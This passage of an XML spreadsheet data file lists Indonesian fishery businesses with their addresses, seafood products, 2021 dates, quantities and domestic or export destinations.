    <n v="29"/>
    <s v="Tuna Segar"/>
    <d v="2021-03-12T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="24063"/>
    <x v="975"/>
    <s v="PT. MANADO MAJU SARANA LOGISTIK"/>
    <s v="Desa Paniki Atas Jaga IV, Kec. Talawaan, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Demersal Beku (Kerapu, Kakatua, Bawal, Kakap)"/>
    <d v="2021-03-12T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="24064"/>
    <x v="133"/>
    <s v="PT. HOLI MINA JAYA"/>
    <s v="Jl. Raya Semarang - Tuban Km 138, Kel. Sendangmulyo, Kec. Sluke, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Udang Beku"/>
    <d v="2021-03-31T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="24065"/>
    <x v="133"/>
    <s v="PT. HOLI MINA JAYA"/>
    <s v="Jl. Raya Semarang - Tuban Km 138, Kel. Sendangmulyo, Kec. Sluke, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Lobster Beku"/>
    <d v="2021-03-31T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="China, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="24066"/>
    <x v="133"/>
    <s v="PT. HOLI MINA JAYA"/>
    <s v="Jl. Raya Semarang - Tuban Km 138, Kel. Sendangmulyo, Kec. Sluke, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Kerang Beku"/>
    <d v="2021-03-31T00:00:00"/>
    <n v="500000"/>
    <m/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="24068"/>
    <x v="975"/>
    <s v="PT. MANADO MAJU SARANA LOGISTIK"/>
    <s v="Desa Paniki Atas Jaga IV, Kec. Talawaan, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Kepiting Segar"/>
    <d v="2021-03-12T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="24069"/>
    <x v="975"/>
    <s v="PT. MANADO MAJU SARANA LOGISTIK"/>
    <s v="Desa Paniki Atas Jaga IV, Kec. Talawaan, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Kepiting Hidup"/>
    <d v="2021-03-12T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="24070"/>
    <x v="975"/>
    <s v="PT. MANADO MAJU SARANA LOGISTIK"/>
    <s v="Desa Paniki Atas Jaga IV, Kec. Talawaan, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Kepiting Beku"/>
    <d v="2021-03-12T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="24071"/>
    <x v="975"/>
    <s v="PT. MANADO MAJU SARANA LOGISTIK"/>
    <s v="Desa Paniki Atas Jaga IV, Kec. Talawaan, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Lobster Hidup"/>
    <d v="2021-03-12T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="24072"/>
    <x v="975"/>
    <s v="PT. MANADO MAJU SARANA LOGISTIK"/>
    <s v="Desa Paniki Atas Jaga IV, Kec. Talawaan, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Lobster Beku"/>
    <d v="2021-03-12T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="24073"/>
    <x v="975"/>
    <s v="PT. MANADO MAJU SARANA LOGISTIK"/>
    <s v="Desa Paniki Atas Jaga IV, Kec. Talawaan, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Lobster Segar"/>
    <d v="2021-03-12T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="24079"/>
    <x v="249"/>
    <s v="PT. SUMBER MINA SAMUDERA"/>
    <s v="Jl. Ikan Tuna III No.1A Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Pelagis Beku (Escolar, Marlin, Meka, Gindara, Tenggiri)"/>
    <d v="2021-02-26T00:00:00"/>
    <n v="312000"/>
    <m/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="24080"/>
    <x v="977"/>
    <s v="PUDUNG ANUGRAH"/>
    <s v="Jl. Sungai Kampar, Sentra Pengolahan Hasil Perikanan, Kel. Desa Koto Mesjid, Kec. XIII Koto Kampar, Kabupaten Kampar&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Patin Bernilai Tambah Beku (Bakso Patin, Nugget Patin)"/>
    <d v="2021-01-29T00:00:00"/>
    <n v="2400"/>
    <s v="Kabupaten Kampar"/>
    <m/>
  </r>
  <r>
    <n v="24082"/>
    <x v="977"/>
    <s v="PUDUNG ANUGRAH"/>
    <s v="Jl. Sungai Kampar, Sentra Pengolahan Hasil Perikanan, Kel. Desa Koto Mesjid, Kec. XIII Koto Kampar, Kabupaten Kampar&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Abon Patin"/>
    <d v="2021-01-29T00:00:00"/>
    <n v="60"/>
    <s v="Kabupaten Kampar"/>
    <m/>
  </r>
  <r>
    <n v="24083"/>
    <x v="977"/>
    <s v="PUDUNG ANUGRAH"/>
    <s v="Jl. Sungai Kampar, Sentra Pengolahan Hasil Perikanan, Kel. Desa Koto Mesjid, Kec. XIII Koto Kampar, Kabupaten Kampar&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Patin Asin Beku"/>
    <d v="2021-01-29T00:00:00"/>
    <n v="2400"/>
    <s v="Kabupaten Kampar"/>
    <m/>
  </r>
  <r>
    <n v="24087"/>
    <x v="844"/>
    <s v="CV. SARI MUTIARA ABADI"/>
    <s v="Dusun Krajan RT 02 RW 04, Kel. Srigading, Kec. Lawang, Kabupaten Malang&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Rumput Laut Kering"/>
    <d v="2021-04-01T00:00:00"/>
    <n v="2400000"/>
    <s v="Kota Jakarta Pusat, Kabupaten Pasuruan, Kabupaten Sidoarjo, Kota Surabaya"/>
    <s v="Belgium, Chile, China, India, Italy, Philippines, Taiwan, Province of China, Thailand, United Arab Emirates, Viet Nam"/>
  </r>
  <r>
    <n v="24088"/>
    <x v="664"/>
    <s v="PT. YU SHEN FISHERY INDONESIA"/>
    <s v="Jl. Pemelisan No. 168 Suwung Batan Kendal, Kel. Sesetan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Demersal Hidup (Swanggi, Kerapu, Layur, Bawal, Sillago, Kakap)"/>
    <d v="2021-04-07T00:00:00"/>
    <n v="48000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="24089"/>
    <x v="664"/>
    <s v="PT. YU SHEN FISHERY INDONESIA"/>
    <s v="Jl. Pemelisan No. 168 Suwung Batan Kendal, Kel. Sesetan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Udang Ronggeng Hidup"/>
    <d v="2021-04-07T00:00:00"/>
    <n v="24000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="24090"/>
    <x v="664"/>
    <s v="PT. YU SHEN FISHERY INDONESIA"/>
    <s v="Jl. Pemelisan No. 168 Suwung Batan Kendal, Kel. Sesetan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Siput Hidup"/>
    <d v="2021-04-07T00:00:00"/>
    <n v="12000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="24091"/>
    <x v="664"/>
    <s v="PT. YU SHEN FISHERY INDONESIA"/>
    <s v="Jl. Pemelisan No. 168 Suwung Batan Kendal, Kel. Sesetan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Abalon Hidup"/>
    <d v="2021-04-07T00:00:00"/>
    <n v="12000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="24095"/>
    <x v="978"/>
    <s v="CV. PERSADA SEMESTA"/>
    <s v="Dusun Cikoang, Kel. Lakatong, Kec. Mangarabombang, Kabupaten Takalar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Rumput Laut Kering"/>
    <d v="2021-03-25T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Surabaya"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="24096"/>
    <x v="979"/>
    <s v="PT, USAHA CENTRALJAYA SAKTI"/>
    <s v="Jl, Kima V Kav E No,3A , Kel, Daya, Kec, Biringkannaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Cephalopoda Segar (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-03-12T00:00:00"/>
    <n v="200000"/>
    <m/>
    <s v="Australia, Japan, Lao People's Democratic Republic, United States, Viet Nam"/>
  </r>
  <r>
    <n v="24097"/>
    <x v="979"/>
    <s v="PT, USAHA CENTRALJAYA SAKTI"/>
    <s v="Jl, Kima V Kav E No,3A, Kel, Daya, Kec, Biringkannaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Pelagis Segar (Tongkol, Terbang, Kembung, Sarden, Selar, Layang, Cakalang, Tenggiri)"/>
    <d v="2021-03-12T00:00:00"/>
    <n v="200000"/>
    <m/>
    <s v="Australia, Japan, Lao People's Democratic Republic, Malaysia, Taiwan, Province of China, United States, Viet Nam"/>
  </r>
  <r>
    <n v="24098"/>
    <x v="976"/>
    <s v="CV. MAMORA"/>
    <s v="Jl. Srikuncoro III No.118, Kel. Kalibanteng Kulon, Kec. Semarang Barat, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Tuna Saku Beku"/>
    <d v="2021-03-25T00:00:00"/>
    <n v="2000"/>
    <s v="Kota Semarang, Kota Yogyakarta, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="24099"/>
    <x v="976"/>
    <s v="CV. MAMORA"/>
    <s v="Jl. Srikuncoro III No.118, Kel. Kalibanteng Kulon, Kec. Semarang Barat, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Steak Tuna Beku"/>
    <d v="2021-03-25T00:00:00"/>
    <n v="2000"/>
    <s v="Kota Semarang, Kota Yogyakarta, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="24100"/>
    <x v="976"/>
    <s v="CV. MAMORA"/>
    <s v="Jl. Srikuncoro III No.118, Kel. Kalibanteng Kulon, Kec. Semarang Barat, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Udang Kupas Beku"/>
    <d v="2021-03-25T00:00:00"/>
    <n v="500"/>
    <s v="Kota Semarang, Kota Yogyakarta"/>
    <m/>
  </r>
  <r>
    <n v="24106"/>
    <x v="980"/>
    <s v="KOPERASI KERAPU"/>
    <s v="Jl. Utama, Kel. Sinaboi, Kec. Sinaboi, Kabupaten Rokan Hilir&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Udang Segar"/>
    <d v="2021-01-29T00:00:00"/>
    <n v="144000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="24107"/>
    <x v="980"/>
    <s v="KOPERASI KERAPU"/>
    <s v="Jl. Utama, Kel. Sinaboi, Kec. Sinaboi, Kabupaten Rokan Hilir&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Rajungan Segar"/>
    <d v="2021-01-29T00:00:00"/>
    <n v="144000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="24108"/>
    <x v="980"/>
    <s v="KOPERASI KERAPU"/>
    <s v="Jl. Utama, Kel. Sinaboi, Kec. Sinaboi, Kabupaten Rokan Hilir&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Ikan Pelagis Segar (Kembung, Selar, Tenggiri, Selar Kuning)"/>
    <d v="2021-01-29T00:00:00"/>
    <n v="720000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="24109"/>
    <x v="980"/>
    <s v="KOPERASI KERAPU"/>
    <s v="Jl. Utama, Kel. Sinaboi, Kec. Sinaboi, Kabupaten Rokan Hilir&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Ikan Demersal Segar (Kakap Putih, Bawal Hitam, Kerapu Bintik, Sembilang, Sebelah, Senangin)"/>
    <d v="2021-01-29T00:00:00"/>
    <n v="1152000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="24110"/>
    <x v="981"/>
    <s v="PT. BINTANG MEGAH JAYA PAPUA"/>
    <s v="Jl. Tanjung Perak KM 9 No.3, Kel. Sawagumu, Kec. Sorong Utara, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Ikan Pelagis Segar (Tenggiri)"/>
    <d v="2021-02-15T00:00:00"/>
    <n v="8000"/>
    <s v="Kota Jakarta Utara, Kota Makassar"/>
    <s v="China, Hong Kong, Singapore"/>
  </r>
  <r>
    <n v="24111"/>
    <x v="981"/>
    <s v="PT. BINTANG MEGAH JAYA PAPUA"/>
    <s v="Jl. Tanjung Perak KM 9 No.3, Kel. Sawagumu, Kec. Sorong Utara, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Ikan Demersal Segar (Kerapu, Kakap)"/>
    <d v="2021-02-15T00:00:00"/>
    <n v="8000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="24112"/>
    <x v="982"/>
    <s v="PT. KENCANA BINTANG TERANG"/>
    <s v="Jl. Raya Cirebon-Tegal KM. 8,2, Kel. Kanci Kulon, Kec. Astanajapura, Kabupaten Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Daging Rajungan Pasteurisasi Kaleng"/>
    <d v="2021-03-03T00:00:00"/>
    <n v="190000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="24113"/>
    <x v="982"/>
    <s v="PT. KENCANA BINTANG TERANG"/>
    <s v="Jl. Raya Cirebon-Tegal KM. 8,2, Kel. Kanci Kulon, Kec. Astanajapura, Kabupaten Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Daging Rajungan Beku"/>
    <d v="2021-03-03T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="24114"/>
    <x v="982"/>
    <s v="PT. KENCANA BINTANG TERANG"/>
    <s v="Jl. Raya Cirebon-Tegal KM. 8,2, Kel. Kanci Kulon, Kec. Astanajapura, Kabupaten Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tude, Tongkol, Cobia, Kembung)"/>
    <d v="2021-03-03T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="24115"/>
    <x v="982"/>
    <s v="PT. KENCANA BINTANG TERANG"/>
    <s v="Jl. Raya Cirebon-Tegal KM. 8,2, Kel. Kanci Kulon, Kec. Astanajapura, Kabupaten Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Demersal Beku (Lencam, Kerapu, Kakatua, Pinjalo, Kakap, Kaci-kaci, Kuro)"/>
    <d v="2021-03-03T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="24116"/>
    <x v="982"/>
    <s v="PT. KENCANA BINTANG TERANG"/>
    <s v="Jl. Raya Cirebon-Tegal KM. 8,2, Kel. Kanci Kulon, Kec. Astanajapura, Kabupaten Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-03-03T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="24117"/>
    <x v="982"/>
    <s v="PT. KENCANA BINTANG TERANG"/>
    <s v="Jl. Raya Cirebon-Tegal KM. 8,2, Kel. Kanci Kulon, Kec. Astanajapura, Kabupaten Cirebon&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Udang Mentah Beku"/>
    <d v="2021-03-03T00:00:00"/>
    <n v="7000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="24118"/>
    <x v="983"/>
    <s v="PEMPEK RIZKY"/>
    <s v="Jl. KHM Asyik RT 029 RW 009, Kel. 3-4 Ulu, Kec. Seberang Ulu I, Kota Palembang&lt;br&gt;Sumatera Selatan"/>
    <n v="9"/>
    <s v="Pempek Ikan"/>
    <d v="2021-03-03T00:00:00"/>
    <n v="2000"/>
    <s v="Kota Palembang"/>
    <m/>
  </r>
  <r>
    <n v="24119"/>
    <x v="983"/>
    <s v="PEMPEK RIZKY"/>
    <s v="Jl. KHM Asyik RT 029 RW 009, Kel. 3-4 Ulu, Kec. Seberang Ulu I, Kota Palembang&lt;br&gt;Sumatera Selatan"/>
    <n v="9"/>
    <s v="Kerupuk Ikan"/>
    <d v="2021-03-03T00:00:00"/>
    <n v="6000"/>
    <s v="Kota Palembang"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="24120"/>
    <x v="984"/>
    <s v="CV. ADI MINA MAKMUR"/>
    <s v="Jl. Yos Sudarso Sipung RT 001 RW 004, Kel. Karangasem Utara, Kec. Batang, Kabupaten Batang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Demersal Beku (Gulama, Lencam, Sebelah, Kerapu, Layur, Kakatua, Bawal, Kakap)"/>
    <d v="2021-04-14T00:00:00"/>
    <n v="250000"/>
    <m/>
    <s v="China, Malaysia, Pakistan, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="24121"/>
    <x v="984"/>
    <s v="CV. ADI MINA MAKMUR"/>
    <s v="Jl. Yos Sudarso Sipung RT 001 RW 004, Kel. Karangasem Utara, Kec. Batang, Kabupaten Batang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tongkol, Kembung, Marlin, Salem, Selar, Cakalang, Tenggiri)"/>
    <d v="2021-04-14T00:00:00"/>
    <n v="250000"/>
    <m/>
    <s v="China, Japan, Malaysia, Pakistan, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="24122"/>
    <x v="984"/>
    <s v="CV. ADI MINA MAKMUR"/>
    <s v="Jl. Yos Sudarso Sipung RT 001 RW 004, Kel. Karangasem Utara, Kec. Batang, Kabupaten Batang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-04-14T00:00:00"/>
    <n v="250000"/>
    <m/>
    <s v="China, Japan, Malaysia, Pakistan, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="24123"/>
    <x v="984"/>
    <s v="CV. ADI MINA MAKMUR"/>
    <s v="Jl. Yos Sudarso Sipung RT 001 RW 004, Kel. Karangasem Utara, Kec. Batang, Kabupaten Batang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Udang Beku"/>
    <d v="2021-04-14T00:00:00"/>
    <n v="250000"/>
    <m/>
    <s v="China, Japan, Malaysia, Pakistan, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="24124"/>
    <x v="984"/>
    <s v="CV. ADI MINA MAKMUR"/>
    <s v="Jl. Yos Sudarso Sipung RT 001 RW 004, Kel. Karangasem Utara, Kec. Batang, Kabupaten Batang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Kerang Beku"/>
    <d v="2021-04-14T00:00:00"/>
    <n v="250000"/>
    <m/>
    <s v="China, Japan, Malaysia, Pakistan, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="24126"/>
    <x v="985"/>
    <s v="PT. PRIMA INDO BAHARI"/>
    <s v="Jl. Dermaga Muara Angke No.8, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-03-23T00:00:00"/>
    <n v="25000"/>
    <m/>
    <s v="Australia, China, Viet Nam"/>
  </r>
  <r>
    <n v="24127"/>
    <x v="985"/>
    <s v="PT. PRIMA INDO BAHARI"/>
    <s v="Jl. Dermaga Muara Angke No.8, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Kakap Putih, Bawal Hitam, Gulama, Emperor, Kerapu)"/>
    <d v="2021-03-23T00:00:00"/>
    <n v="75000"/>
    <m/>
    <s v="Australia, China, Viet Nam"/>
  </r>
  <r>
    <n v="24128"/>
    <x v="985"/>
    <s v="PT. PRIMA INDO BAHARI"/>
    <s v="Jl. Dermaga Muara Angke No.8, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tongkol, Kembung, Lemadang, Muroaji)"/>
    <d v="2021-03-23T00:00:00"/>
    <n v="1980000"/>
    <s v="Kota Jakarta Utara, Kabupaten Garut, Kabupaten Cirebon, Kabupaten Subang, Kota Sukabumi, Kota Cirebon"/>
    <s v="Australia, China, Viet Nam"/>
  </r>
  <r>
    <n v="24129"/>
    <x v="985"/>
    <s v="PT. PRIMA INDO BAHARI"/>
    <s v="Jl. Dermaga Muara Angke No.8, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kepiting Beku"/>
    <d v="2021-03-23T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Australia, China, Viet Nam"/>
  </r>
  <r>
    <n v="24130"/>
    <x v="985"/>
    <s v="PT. PRIMA INDO BAHARI"/>
    <s v="Jl. Dermaga Muara Angke No. 8, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Beku"/>
    <d v="2021-03-23T00:00:00"/>
    <n v="25000"/>
    <m/>
    <s v="Australia, China, Viet Nam"/>
  </r>
  <r>
    <n v="24131"/>
    <x v="37"/>
    <s v="PT. LAUTAN MUTIARA JAYA"/>
    <s v="Jl. Muara Angke PHPT Blok A No.01-06, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Sri Lanka, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24132"/>
    <x v="985"/>
    <s v="PT. PRIMA INDO BAHARI"/>
    <s v="Jl. Dermaga Muara Angke No.8, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Hiu Beku"/>
    <d v="2021-03-23T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="Australia, China, Viet Nam"/>
  </r>
  <r>
    <n v="24133"/>
    <x v="985"/>
    <s v="PT. PRIMA INDO BAHARI"/>
    <s v="Jl. Dermaga Muara Angke No. 8, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Segar"/>
    <d v="2021-03-23T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="Australia, China, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="24134"/>
    <x v="37"/>
    <s v="PT. LAUTAN MUTIARA JAYA"/>
    <s v="Jl. Muara Angke PHPT Blok A No.01-06, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kembung, Lemadang, Salem, Muroaji, Cakalang, Tenggiri)"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Hong Kong, Japan, Malaysia, Mauritius, Pakistan, Singapore, Thailand, United Arab Emirates, Viet Nam"/>
  </r>
  <r>
    <n v="24135"/>
    <x v="985"/>
    <s v="PT. PRIMA INDO BAHARI"/>
    <s v="Jl. Dermaga Muara Angke No.8, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerang Beku"/>
    <d v="2021-03-23T00:00:00"/>
    <n v="15000"/>
    <m/>
    <s v="Australia, China, Viet Nam"/>
  </r>
  <r>
    <n v="24136"/>
    <x v="37"/>
    <s v="PT. LAUTAN MUTIARA JAYA"/>
    <s v="Jl. Muara Angke PHPT Blok A No.01-06, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kepiting Beku"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24137"/>
    <x v="37"/>
    <s v="PT. LAUTAN MUTIARA JAYA"/>
    <s v="Jl. Muara Angke PHPT Blok A No.01-06, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Beku"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Hong Kong, Japan, Malaysia, Singapore, Sri Lanka, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="24138"/>
    <x v="37"/>
    <s v="PT. LAUTAN MUTIARA JAYA"/>
    <s v="Jl. Muara Angke PHPT Blok A No.01-06, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Malong, Lencam, Kerapu, Layur, Beloso, Bawal, Kakap, Ekor Kuning)"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Hong Kong, Japan, Malaysia, Singapore, Sri Lanka, Suriname, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="24139"/>
    <x v="37"/>
    <s v="PT. LAUTAN MUTIARA JAYA"/>
    <s v="Jl. Muara Angke PHPT Blok A No.01-06, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Beku"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Australia, China, Japan, Malaysia, Singapore, Taiwan, Province of China, Thailand, United Arab Emirates, Viet Nam"/>
  </r>
  <r>
    <n v="24140"/>
    <x v="37"/>
    <s v="PT. LAUTAN MUTIARA JAYA"/>
    <s v="Jl. Muara Angke PHPT Blok A No.01-06, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerang Beku"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Hong Kong, Japan, Malaysia, Singapore, Taiwan, Province of China, Thailand, United Arab Emirates, Viet Nam"/>
  </r>
  <r>
    <n v="24141"/>
    <x v="37"/>
    <s v="PT. LAUTAN MUTIARA JAYA"/>
    <s v="Jl. Muara Angke PHPT Blok A No.01-06, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Hiu Beku"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Hong Kong, Japan, Malaysia, Pakistan, Singapore, Sri Lanka, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="24142"/>
    <x v="37"/>
    <s v="PT. LAUTAN MUTIARA JAYA"/>
    <s v="Jl. Muara Angke PHPT Blok A No.01-06, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Asin Kering"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Utara"/>
